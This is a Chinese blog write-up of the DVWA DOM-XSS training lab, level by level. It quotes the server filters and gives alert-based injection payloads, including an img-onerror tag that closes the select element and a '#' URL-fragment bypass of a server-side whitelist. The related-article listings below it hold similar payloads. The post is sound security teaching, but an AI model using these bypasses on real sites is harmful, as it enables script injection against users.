DVWA DOM-XSS

最新推荐文章于 2022-10-06 23:59:56 发布
最新推荐文章于 2022-10-06 23:59:56 发布
阅读量361 收藏 1
点赞数
分类专栏: # DVWA # XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901998/article/details/108358288
版权
XSS 同时被 2 个专栏收录
5 篇文章 0 订阅
订阅专栏
DVWA
2 篇文章 0 订阅
订阅专栏

文章目录

关于DOM

因为自己还没有深入,系统的学习js和html。因此对于DOM的理解也不深入,就目前个人的认识,DOM类型的XSS是利用浏览器访问DOM对象,修改网页html结构,从而达到xss注入。等以后详细的学习了,再把这个介绍补上。

这里推荐一篇有关DOM-XSS介绍的文章:
DOM-XSS攻击原理与防御

low

low级别,没有防护。
但是这里的输入框是一种选择类型的框框,无法在输入框中构造payload。但是通过观察可以发现,输入框所选择的内容会被构造到url中发送。所以可以在url中构造payload发送。

payload

?default=<script>alert(1)</script>

medium

看下源码

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
	$default = $_GET['default'];
	
	# Do not allow script tags
	if (stripos ($default, "<script") !== false) {
		header ("location: ?default=English");
		exit;
	}
}

?>

后台过滤掉了<script>标签,因此首先要选择避开<script>的注入。
再来看一下部分网页源码:

<form name="XSS" method="GET">
			<select name="default">
				<script>
					if (document.location.href.indexOf("default=") >= 0) {
						var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
						document.write("<option value='" + lang + "'>" + decodeURI(lang) + "</option>");
						document.write("<option value='' disabled='disabled'>----</option>");
					}
					    
					document.write("<option value='English'>English</option>");
					document.write("<option value='French'>French</option>");
					document.write("<option value='Spanish'>Spanish</option>");
					document.write("<option value='German'>German</option>");
				</script>
			</select>
			<input type="submit" value="Select" />
		</form>

这里会收录url中default参数提交的内容,然后构造成一个<option>标签写到页面里。
因此,注入点可能就是在default后面构造payload

这里可以直接闭合<select>,利用<img>注入。
payload

/?default=</select><img src=1 onerror=alert(1)>

high

在没看后台源码之前,输入了好多标签都不管用。猜测可能是带尖括号的都被过滤了吧。
这里利用#的机制,绕过后台的过滤。
原理:在URL中#表示的是一个锚点。在浏览器识别url的时候,会把#后的字符当做页面的定位,然后加载页面的时候,直接定位到指定的标签。因此#后面的字符是不会被浏览器发送到服务器端的。这样就实现了绕过服务器端的防御机制。而依赖DOM修改html结构执行的是js代码,这个执行过程是在客户浏览器端的,因此实现了不经过服务器就可以实现xss注入。

payload

?default=English#</select><img src=1 onerror=alert(1)>

抓包看一下:
在这里插入图片描述
#之后的内容,没有被传过去。

然后再来看一下服务器端的过滤机制。

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

	# White list the allowable languages
	switch ($_GET['default']) {
		case "French":
		case "English":
		case "German":
		case "Spanish":
			# ok
			break;
		default:
			header ("location: ?default=English");
			exit;
	}
}

?>

这里用的switch语句,也就是只能输入它规定的几个字符串,否则直接被重定向成English

impossible

这里后端没有php防护,但是在前端进行了防护。

if (document.location.href.indexOf("default=") >= 0) {
	var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
	document.write("<option value='" + lang + "'>" + (lang) + "</option>");
	document.write("<option value='' disabled='disabled'>----</option>");
}

这里的lang没有像之前一样经过decodeURL解码。因此输入进去的数据都会经过url编码呈现到页面上。

老司机开代码
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA】--- 十一、DOMXSS(XSS DOM)
qq_43168364的博客
05-31 321
XSS DOM 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法
DVWA靶场通关----(10) XSS(DOM)教程
最新发布
z09364517158的博客
04-02 618
客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM—based XSS漏洞。XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。document.referer属性。
DVWA-DOM XSS
七月_的博客
10-25 777
文章目录DOM XSS (Low)代码分析漏洞利用DOM XSS(Medium)代码分析漏洞利用绕过DOM XSS(High)代码分析漏洞利用 DOM XSS (Low) vulnerabilities/xss_r/source/low.php 代码分析 无任何过滤 漏洞利用 输入,成功弹框: DOM XSS(Medium) 代码分析 漏洞利用 绕过 DOM XSS(High) 代码分析 漏...
DVWA DOMXSS
scrawman的博客
02-27 364
前言 DVWA上的DOMXSS与反射型和存储型XSS不同,页面上是没有输入的,所以要直接在URL上实施攻击 一、Low low级别的代码什么防护都没有,因此直接输入URL:http://192.168.44.1/DVWA/vulnerabilities/xss_d/?default=<script>alert('xss')</script> 二、Medium Medium级别的代码增加了检查机制,如果输入当中有“<script”就把default设为English阻止XS
DVWAXSS
谢公子的博客
08-05 1944
  XSS XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储型的XSS与反射型的XSSDOM型的XSS由于其特殊性,常...
DVWA XSS DOM
m0_56107268的博客
04-30 1013
DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOMXSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。 在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,..
DVWA-master.zip
01-05
2. **跨站脚本(XSS)**:DVWA提供了不同类型的XSS漏洞,包括存储型、反射型和DOMXSSXSS攻击能让攻击者在用户浏览器上执行恶意脚本,可能盗取cookie、实施钓鱼攻击或者进行其他恶意活动。 3. **文件包含漏洞**...
DVWAXSSDOM
RexHa的博客
10-06 2025
dvwa XSSDOM
一、详解 DVWA_DOMXSS
在下小黄的博客
05-22 1603
第一篇,DVWA_DOMXSS详解
DVWA下的XSS
NWC2017的博客
07-25 1423
DVWA下的XSS
DVWA源代码
10-16
dvwa web漏洞演示平台代码,有需要的朋友可以下载
DVWA XSS(DOM树)
qq_43452198的博客
04-23 446
XSS DOMlowmediumhighimpossible XSS(Cross Site Script),全称跨站脚本攻击,为了与 CSS(Cascading Style Sheet) 有所区别,所以在安全领域称为 XSSXSS 攻击,通常指黑客通过 HTML 注入 篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击行为。 DOM型的XSS由于其特殊性,常常被分为第三种,这...
DVWADOM XSS(DOM型跨站脚本攻击)
热门推荐
谢公子的博客
10-03 2万+
目录 Low Medium High Impossible Low 源代码: &lt;?php # No protections, anything goes ?&gt; 从源代码可以看出,这里low级别的代码没有任何的保护性措施! 页面本意是叫我们选择默认的语言,但是对default参数没有进行任何的过滤 所以我们可以构造XSS代码,访问链接: http://127...
DVWA 通关XSS (DOM)
干铮的博客
08-01 1967
DomXSS DomXSS是一种XSS攻击,其中攻击的代码是由于受害者浏览器页面的DOM树而执行的特殊的地方就是代码攻击(payload) 在浏览器本地修改Dom树而执行,并不会将payload上传到服务器,这也使得DOMXSS比较难以检测 Low 简单难度没有参数过滤,直接修改下拉框上传参数的值 default=<script>alert(/xss/)</script> Medium 过滤了<script>标签 闭合</option&gt
DOMXSS以及DVWA平台的DOMXSS练习
sweetie 的博客
10-27 447
DOMxss的实现过程都是在前台 介绍两种场景的DOMxss 两种场景都适用的POC #' οnclick="alert(111)"> 或者这个POC #"><img src=1 οnerrοr=alert(1)> ** DVWA平台的DOMXSS练习 ** 1. Low low级别的代码没有任何的保护性措施 页面本意是叫我们选择默认的语言,但是对default参数没有进行任何的过滤 <script>alert('sweetie')</script&gt
DVWA-DOMXSS全等级绕过方法
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-30 3181
DOMXSS全等级绕过前言一、LOW级别二、Medium级别图片插入语句法三、High级别字符 # 绕过服务端过滤四、Impossible级别 前言     DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。DOMXSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Do
DVWA指点迷津-XSS(DOM)
肉肉球麻里的博客
10-22 142
DOM Based XSS 特点 既可能是反射型,也可能是存储型。利用前端的DOM树来造成XSS攻击。 漏洞危害 泄露用户的Cooike 泄露用户的IP地址、浏览器信息 篡改网页 XSS钓鱼 DVWA Low 应用防御措施 仅有前端代码,服务器无任何防御措施 攻击方式 通过修改URL传递参数,构造XSS测试payload Payload:?default=<script>alert('xss')</script> Medium 应用防御措施 服务器做了对“script”的验证
DVWA--XSS
老司机开代码的博客
09-02 190
文章目录lowmediumHighImpossible low payload <script>alert(1)</script> <a href=javascript:alert(1)> 123 low级别没有什么防御机制,一般的payload都是可以的。 medium payload <a href=javascript:alert(1)>123 <scRipt>alert(1)</script> <scri<
通过DVWA学习DOMXSS
Mi1k7ea
01-02 4028
下了个新版的DVWA看了下,发现新增了好几个Web漏洞类型,就玩一下顺便做下笔记,完善一下之前那篇很水的DOM XSS文章,虽然这个也很水 :) 基本概念 DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOMXSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞,其触...
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)是指DVWA靶机学习中的一种XSS攻击,它利用了DOM(文档对象模型)中的漏洞。DOM是一个与平台、编程语言无关的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值